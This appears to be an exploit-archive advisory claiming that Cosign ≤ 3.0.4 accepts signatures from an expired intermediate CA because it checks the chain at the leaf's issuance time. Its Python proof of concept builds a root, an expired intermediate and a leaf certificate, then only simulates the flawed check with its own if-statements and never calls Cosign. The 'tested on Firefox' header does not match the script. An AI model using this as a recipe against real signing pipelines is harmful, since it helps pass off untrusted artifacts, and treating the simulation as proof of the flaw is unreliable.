============================================================================================================================================= | # Title : Cosign ≤ 3.0.4 Temporal Certificate Chain Validation Bypass in Due to Improper Use of Issuance Time | | # Author : indoushka | | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) | | # Vendor : https://github.com/sigstore/cosign/releases | ============================================================================================================================================= [+] Summary : A logical flaw in the certificate verification process of Cosign (≤ 3.0.4) allows signatures to be accepted even when the issuing Intermediate Certificate Authority (CA) has already expired. The vulnerability arises from validating the certificate chain using the leaf certificate’s issuance time (NotBefore) instead of the current system time. Because of this, the chain is considered valid if it was valid at the moment the leaf certificate was issued, regardless of whether the Intermediate CA is expired at verification time. The verification process performs two separate checks: It validates the certificate chain at the leaf’s issuance time. It validates that the leaf certificate itself is currently within its validity period. If both conditions pass, the signature is accepted — even though the Intermediate CA is no longer valid. [+] POC : pip install cryptography import datetime from cryptography import x509 from cryptography.x509.oid import NameOID from cryptography.hazmat.primitives import hashes, serialization from cryptography.hazmat.primitives.asymmetric import ec def create_poc(): now = datetime.datetime.utcnow() root_key = ec.generate_private_key(ec.SECP256R1()) sub_key = ec.generate_private_key(ec.SECP256R1()) leaf_key = ec.generate_private_key(ec.SECP256R1()) root_subject = x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, u"Root CA")]) root_cert = ( x509.CertificateBuilder() .subject_name(root_subject) .issuer_name(root_subject) .public_key(root_key.public_key()) .serial_number(x509.random_serial_number()) .not_valid_before(now - datetime.timedelta(hours=10)) .not_valid_after(now + datetime.timedelta(hours=10)) .add_extension(x509.BasicConstraints(ca=True, path_length=None), critical=True) .sign(root_key, hashes.SHA256()) ) sub_subject = x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, u"Expired Intermediate")]) sub_cert = ( x509.CertificateBuilder() .subject_name(sub_subject) .issuer_name(root_subject) .public_key(sub_key.public_key()) .serial_number(x509.random_serial_number()) .not_valid_before(now - datetime.timedelta(hours=2)) .not_valid_after(now - datetime.timedelta(minutes=10)) # Expired! .add_extension(x509.BasicConstraints(ca=True, path_length=None), critical=True) .sign(root_key, hashes.SHA256()) ) leaf_subject = x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, u"Valid Leaf")]) leaf_cert = ( x509.CertificateBuilder() .subject_name(leaf_subject) .issuer_name(sub_subject) .public_key(leaf_key.public_key()) .serial_number(x509.random_serial_number()) .not_valid_before(now - datetime.timedelta(minutes=30)) .not_valid_after(now + datetime.timedelta(minutes=30)) .sign(sub_key, hashes.SHA256()) ) print("--- Simulating Vulnerable Logic (Cosign <= 3.0.4) ---") issuance_time = leaf_cert.not_valid_before if sub_cert.not_valid_before <= issuance_time <= sub_cert.not_valid_after: print(f"[+] Step A: Chain is considered VALID because it was valid at {issuance_time}") if leaf_cert.not_valid_before <= now <= leaf_cert.not_valid_after: print(f"[+] Step B: Leaf is considered VALID at current time {now}") print("\n[!] RESULT: Vulnerable Cosign would accept this signature!") if __name__ == "__main__": create_poc() Greetings to :============================================================================== jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)| ============================================================================================